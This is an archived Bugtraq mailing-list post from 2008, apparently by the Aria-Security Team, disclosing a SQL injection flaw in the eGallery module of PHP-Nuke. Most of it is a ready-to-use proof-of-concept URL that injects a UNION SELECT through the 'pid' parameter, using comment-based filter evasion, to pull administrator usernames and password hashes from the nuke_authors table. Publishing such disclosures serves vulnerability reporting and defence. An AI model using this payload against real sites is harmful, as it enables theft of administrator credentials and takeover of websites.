[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

PHP-Nuke Module eGallery "pid" Remote SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP-Nuke Module eGallery "pid" Remote SQL Injection
From: no-reply@xxxxxxxxxxxxxxxxx
Date: 4 Mar 2008 01:41:31 -0000

Aria-Security Team (Persian Security Network)
http://Aria-Security.net
-----------------------------------------------
Shoutz: AurA, NULL, imm02tal, Kinglet,
PHP-Nuke Module eGallery "pid" Remote SQL Injection

http://forum.aria-security.net/showthread.php?p=1548

PoC
modules.php?name=eGallery&file=index&op=showpic&pi 
d=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202


Regards,
The-0utl4w
(credits goes to aria-security team)

Prev by Date: [ MDVSA-2008:057 ] - Updated wireshark packages fix denial of service vulnerabilities
Next by Date: PHP-Nuke Module "seminar" Local FIle Inclusion
Previous by thread: [ MDVSA-2008:057 ] - Updated wireshark packages fix denial of service vulnerabilities
Next by thread: PHP-Nuke Module "seminar" Local FIle Inclusion
Index(es):
- Date
- Thread